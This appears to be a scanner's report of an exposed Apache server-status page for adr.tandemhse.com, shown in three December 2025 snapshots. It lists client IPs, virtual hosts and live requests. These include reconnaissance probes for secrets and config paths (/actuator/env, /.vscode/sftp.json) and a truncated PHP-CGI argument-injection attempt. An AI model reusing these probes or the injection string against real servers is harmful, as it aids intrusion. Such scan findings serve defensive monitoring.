(open/recv/resp/push/rst) 1-5511372240/17/5509_ 2.09929042253680.00.70179.63 172.68.134.238h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5511372240/20/5459_ 2.119320151632950.00.06159.15 104.22.7.170h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5511372240/22/5532_ 2.09928040608910.00.10177.59 172.68.134.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5511372240/19/5470_ 2.08864067427510.00.08213.24 172.68.134.116h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5511372240/19/5677_ 2.09136041786850.00.07130.46 172.68.135.142h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/3/6248_ 1.86933039441940.00.01294.81 162.158.123.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/4/6226_ 1.909330106538280.00.01244.87 172.68.134.33h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/0/6329_ 0.00933031579120.00.00216.24 172.71.102.154h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/2/6296_ 1.91930087361570.00.00187.24 172.68.134.192h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/2/6256_ 1.85935237461030.00.04262.45 188.114.111.227h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/5/6399_ 1.91935035073860.00.00240.77 172.68.135.132h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/1/6309_ 1.86930132439780.00.01276.67 162.158.123.202h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/0/6348_ 0.0093045741451210.00.00208.27 172.71.120.21h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/2/6182_ 1.90933039407550.00.01278.87 172.68.135.166h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5511372220/4/6471_ 1.86933040593300.00.01202.45 162.158.123.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5511372230/131/8275_ 5.694052055830.01.12260.16 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 3-5511372230/135/8100_ 5.701066109480.00.74255.94 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5511372230/133/7964_ 5.6920130814600.01.44299.78 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 3-5511372230/132/8130_ 5.731058427340.00.65260.19 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-5511372230/123/8380_ 5.717056263610.04.17278.44 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-5511372230/126/7968_ 5.719054473860.01.30246.70 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-5511372230/131/8179_ 5.721067023460.01.47241.53 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-5511372230/135/8344W 5.710059533640.00.78362.78 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-5511372230/135/8260_ 5.716056190700.01.03272.00 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-5511372230/141/8196_ 5.722048527850.00.75242.52 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-5511371770/6/5513_ 1.969330167555250.00.01237.83 162.158.123.164h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5511371770/6/5318_ 2.02931045436440.00.01152.00 172.68.135.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5511371770/3/5545_ 1.94938063214090.00.00202.74 162.158.123.61h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5511371770/4/5559_ 2.03932046697890.00.00210.12 172.68.134.90h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5511371770/6/5570_ 2.02932039793780.00.15151.23 172.68.135.157h2tandemsl.com:443done, streams: 0/1/1/0/0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7555e05c374
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 22-Dec-2025 12:30:40 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 9 days 5 hours 26 minutes 34 seconds Server load: 0.49 1.06 1.11 Total accesses: 246521 - Total Traffic: 8.6 GB - Total Duration: 189002541 CPU Usage: u93.63 s62.71 cu1396.47 cs875.83 - .305% CPU load .309 requests/sec - 11.3 kB/second - 36.5 kB/request - 766.679 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0932904no1yes19000 1933039no0yes010000 2932903no0yes010000 3932905no3yes19010 4932902no0yes010000 Sum504 248010 ______W________________________R__________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-459329040/112/4760_ 13.7024021900510.030.04220.57 2.136.78.3h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-459329040/212/5014_ 13.664027115910.03.67173.10 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-459329040/136/4724_ 13.701159565230.01.85180.42 167.71.204.99http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPROPFIND / HTTP/1.1 0-459329040/152/4919_ 13.666025978100.01.91162.90 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 0-459329040/128/4746_ 13.693622981990.02.95112.14 2.136.78.3h2pre.relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-459329040/124/4996_ 13.69447364239210.03.56162.34 172.70.206.62h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-459329040/160/4907W 13.680026860900.02.90218.17 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-459329040/130/5001_ 13.7024221165290.02.17154.17 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-459329040/98/4751_ 13.693019668190.014.95271.65 89.42.231.239http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-459329040/171/4871_ 13.672024517970.03.03155.88 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-459330390/508/4412_ 34.311019351200.032.44196.72 162.158.122.132h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-459330390/541/4352_ 34.2993020628380.011.84119.15 162.158.116.160h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-459330390/466/4194_ 34.396017811530.018.97157.49 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-459330390/496/4238_ 34.35214015574430.015.5684.13 77.225.201.248h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-459330390/540/4378_ 34.393019917770.07.97149.11 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-459330390/512/4362_ 34.3821023338630.011.55150.79 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 1-459330390/550/4211_ 34.2630138773810.010.88113.25 162.158.116.145h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-459330390/487/4323_ 34.2993028255630.016.60154.50 162.158.116.165h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-459330390/486/4265_ 34.2891018711040.030.26174.01 162.158.116.159h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-459330390/516/4462_ 34.33911831318700.018.44103.64 212.170.119.244h2relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-459329030/100/5334_ 13.28955231132610.02.05251.30 2.136.78.3h2relehse.com:443idle, streams: 0/33/33/0/0 (open/recv/resp/push/rst) 2-459329030/109/5285_ 13.278816297712710.01.39200.62 2.136.78.3h2relehse.com:443idle, streams: 0/24/24/0/0 (open/recv/resp/push/rst) 2-459329030/94/5395_ 13.307214122479950.01.47187.08 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-459329030/99/5349_ 13.28934677927570.04.73164.69 2.136.78.3h2relehse.com:443idle, streams: 0/37/37/0/0 (open/recv/resp/push/rst) 2-459329030/111/5341_ 13.2504328236370.02.28209.48 2.136.78.3h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-459329030/119/5465_ 13.289841225765170.01.50205.35 2.136.78.3h2relehse.com:443idle, streams: 0/32/32/0/0 (open/recv/resp/push/rst) 2-459329030/107/5386_ 13.25941321299390.01.73245.66 2.136.78.3h2relehse.com:443idle, streams: 0/19/19/0/0 (open/recv/resp/push/rst) 2-459329030/120/5409_ 13.289397730439740.01.67184.02 2.136.78.3h2relehse.com:443idle, streams: 0/36/36/0/0 (open/recv/resp/push/rst) 2-459329030/102/5255_ 13.26882029851120.04.36225.74 2.136.78.3h2relehse.com:443done, streams: 0/37/37/0/0 (open/recv/resp/push/rst) 2-459329030/104/5479_ 13.28942731458380.02.34150.46 2.136.78.3h2relehse.com:443idle, streams: 0/34/34/0/0 (open/recv/resp/push/rst) 3-459329050/850/6654_ 38.3311237945590.018.53234.10 2.136.78.3h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-4593290510/681/6493R 38.440051691879.318.84231.41 2.136.78.3h2relehse.com:443POST /admin/evaluated/tree HTTP/2.0 3-459329050/659/6310_ 38.33214117605940.019.86260.55 77.225.201.248h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-459329050/715/6414_ 38.421045436220.023.10208.45 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-459329050/696/6529_ 38.322042353890.016.17208.37 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-459329050/667/6277_ 38.42235141076160.016.14214.83 2.136.78.3h2relehse.com:443idle, streams: 0/15/15/0/0 (open/recv/resp/push/rst) 3-459329050/617/6426_ 38.361052513220.011.20211.47 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-459329050/795/6688_ 38.37248945961740.041.06305.35 2.136.78.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-459329050/807/6613_ 38.421043745540.030.29227.82 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-459329050/627/6334_ 38.423033739880.016.52202.59 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-459329020/36/3576_ 10.041610137304360.00.66162.57 162.158.116.110h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-459329020/41/3495_ 9.598021812490.00.35106.99 104.23.166.73h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-459329020/27/3622_ 9.60161013646340.00.52129.27 144.126.206.5h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-459329020/41/3617_ 10.0516637832809180.01.11166.56 104.22.7.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-459329020/30/3663_ 9.77114652824491770.00.2398.61 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-459329020/39/3532_ 10.04109019070690.00.84
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755acb5471e
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 20-Dec-2025 12:01:30 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 37 Parent Server MPM Generation: 36 Server uptime: 7 days 4 hours 57 minutes 23 seconds Server load: 0.15 0.20 0.41 Total accesses: 207215 - Total Traffic: 7.5 GB - Total Duration: 142216096 CPU Usage: u61.12 s38.21 cu1162.05 cs710.77 - .317% CPU load .333 requests/sec - 12.7 kB/second - 38.1 kB/request - 686.321 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0795984no0yes010000 1795981no0yes010000 2795983no0yes010000 3796115no1yes010000 4795982no1yes28000 Sum502 248000 ___________________________________________W____R_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-367959840/23/4214_ 4.95592220190930.00.39180.71 104.23.221.133h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-367959840/15/4378_ 5.0657578123840760.00.81145.61 172.68.225.81h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-367959840/9/4123_ 5.0657583524381010.00.18169.85 172.70.198.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-367959840/17/4353_ 5.04566023670980.00.34152.64 104.23.172.105h2cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-367959840/13/4188_ 4.6559258021005320.00.32100.68 172.70.143.207h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-367959840/9/4456_ 4.4656692428828110.00.18149.39 162.158.163.240h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-367959840/20/4341_ 5.0157042024802540.00.49201.48 172.71.82.52h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-367959840/16/4427_ 4.5557053019008700.00.43143.87 172.71.124.96h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-367959840/12/4242_ 4.6357044017895980.00.26241.12 172.69.138.95h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-367959840/13/4263_ 5.0757142121925020.00.23145.09 172.69.211.185h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/10/3721_ 4.3965979916480830.00.21161.64 172.70.93.25h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/20/3611_ 4.9962964017284090.00.42103.67 172.68.218.149h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/15/3513_ 4.5861854314289780.00.30134.97 172.68.164.5h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/18/3558_ 5.0662346012298170.00.3658.47 172.69.123.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/15/3637_ 4.96745016684100.00.30138.02 162.158.183.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/20/3654_ 4.9465956220121220.00.37135.47 172.68.191.171h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/13/3471_ 5.0563449125504460.00.2497.79 172.69.46.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/20/3626_ 4.96617224199030.00.38133.72 104.23.217.168h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/15/3578_ 4.9862955514130430.00.32138.15 172.70.208.138h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/18/3747_ 5.0366445228249990.00.3881.42 172.69.36.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/31/4570_ 6.16523017025710.00.60240.04 172.71.183.220h2cinre.tandemhse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-367959830/23/4501_ 6.2843146183989770.00.45189.82 172.71.215.111h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/34/4551_ 6.2647246616254000.00.70164.21 172.70.143.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/32/4564_ 6.16467055347810.00.61148.77 172.71.183.220h2cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/37/4536_ 6.2450752318743690.00.76196.47 172.68.218.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/28/4670_ 6.2250244918018560.00.58194.43 104.23.175.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/37/4609_ 6.2150262018477960.00.71232.72 172.71.124.97h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/31/4642_ 6.1342645120836080.00.94170.93 172.69.36.157h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-367959830/28/4463_ 6.1846745921018780.00.62202.67 104.23.175.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/36/4690_ 6.1942644519771750.00.81137.71 172.71.11.20h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-367961150/412/4914_ 29.55665523718070.015.83190.10 172.69.70.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-367961150/380/4969_ 29.72161741705190.06.97196.88 162.158.120.205h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-367961150/410/4779_ 29.76120106649130.08.15222.56 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-367961150/425/4801_ 29.7614028406500.010.29162.75 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-367961150/419/4975_ 29.70133234532340.016.00176.86 172.68.134.212h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-367961150/406/4733_ 29.621435029160380.07.70169.87 104.23.175.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-367961150/400/4945_ 29.779043965700.07.14180.63 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-367961150/421/5012_ 29.771033212990.015.64240.72 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-367961150/419/4931_ 29.74114127866110.07.13171.96 172.68.134.213h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-367961150/411/4857_ 29.7515023826050.07.23159.00 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 4-367959820/227/3310_ 16.7231136417690.04.19137.08 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-367959820/214/3213_ 16.752020803360.05.59101.71 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-367959820/215/3358_ 16.753012878520.05.06126.80 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-367959820/198/3339W 16.710031895060.04.19158.67 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-367959820/200/3415_ 16.75123423618070.04.3687.47 162.158.41.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755ca2ed865
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 18-Dec-2025 12:26:58 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 27 Parent Server MPM Generation: 26 Server uptime: 5 days 5 hours 22 minutes 52 seconds Server load: 0.27 0.29 0.23 Total accesses: 156902 - Total Traffic: 5.6 GB - Total Duration: 108847614 CPU Usage: u55.77 s35.6 cu821.69 cs506.25 - .314% CPU load .348 requests/sec - 13.0 kB/second - 37.3 kB/request - 693.73 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0567200no1yes010000 1567063no2yes010001 2567066no0yes19000 3567064no0yes010000 4567065no0yes010000 Sum503 149001 ____________________W_____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-265672000/281/3351_ 17.7061015091240.012.44113.07 162.159.113.66h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/274/3469_ 17.691016205530.025.6192.05 162.159.113.161h2lcftech.es:443done, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-265672000/279/3211_ 17.7713921367770.011.94136.51 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/280/3438_ 17.73661817616430.05.7196.73 79.148.250.12h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/269/3320_ 17.7095017483120.04.2165.47 172.71.183.180h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/268/3544_ 17.7095023352350.07.09105.83 172.71.103.21h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/311/3431_ 17.691020445970.043.38140.36 172.71.182.240h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/297/3550_ 17.7095014299170.06.8992.33 104.23.170.111h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/288/3349_ 17.7663713437900.030.03171.23 185.73.170.89h2relehse.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-265672000/285/3330_ 17.6861115352880.011.44108.90 104.23.166.189h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/158/2844_ 11.6813612151000.04.82115.63 2.136.78.3h2relehse.com:443local goaway, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/130/2745_ 11.681012632110.023.7683.71 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/141/2641_ 11.70109902320.015.13118.37 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-265670630/150/2691_ 11.691158134530.01.5341.71 195.76.176.6h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/139/2745_ 11.70115611693600.03.95113.75 51.68.186.52h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/156/2755_ 11.661015464680.02.7196.32 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 1-265670630/128/2626_ 11.700020441200.03.3071.70 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-265670630/150/2766_ 11.671019498820.04.3288.71 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/163/2682_ 11.681249873810.04.45120.76 79.148.250.12h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/143/2835_ 11.680023607330.02.2165.69 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/36/3521W 6.930012639790.00.29200.34 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-265670660/26/3504_ 6.94513280440710.00.15156.92 51.68.186.52h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/41/3501_ 6.8811612084980.02.32129.12 195.76.176.6h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/42/3527_ 6.943051977160.08.63124.05 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-265670660/34/3466_ 6.947014806460.021.50160.65 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-265670660/39/3574_ 6.8845113636800.00.40125.26 185.73.170.89h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/71/3560_ 6.948014010410.013.30193.49 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-265670660/83/3633_ 6.90964916952870.013.47130.00 162.158.216.53h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/37/3451_ 6.935014652690.01.29144.42 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/37/3607_ 6.84762114615860.00.6589.19 172.68.19.120h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/328/3208_ 23.2197011822100.021.14136.91 141.101.76.95h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/332/3287_ 23.2295017829130.012.51131.07 162.159.113.59h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/298/3103_ 23.2197088711160.05.58153.78 104.23.172.103h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/362/3069_ 23.2096213212690.032.60121.15 141.101.76.76h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/289/3266_ 23.2197021032190.05.7096.69 172.71.95.82h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/306/3070_ 23.2195311494850.05.42115.86 104.23.168.99h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/327/3265_ 23.2295021579580.013.22108.67 172.71.182.20h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/339/3297_ 23.2197016285890.059.85152.49 104.23.170.113h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/296/3208_ 23.2195011744090.025.39127.08 172.70.47.38h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/287/3127_ 23.2196012464060.031.02102.80 104.23.172.30h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-265670650/22/2803_ 5.48960133717630.00.58123.82 172.70.47.179h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-265670650/20/2724_ 5.4896018308900.00.2487.74 162.159.113.9h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-265670650/19/2857_ 5.4897110042750.00.13113.33 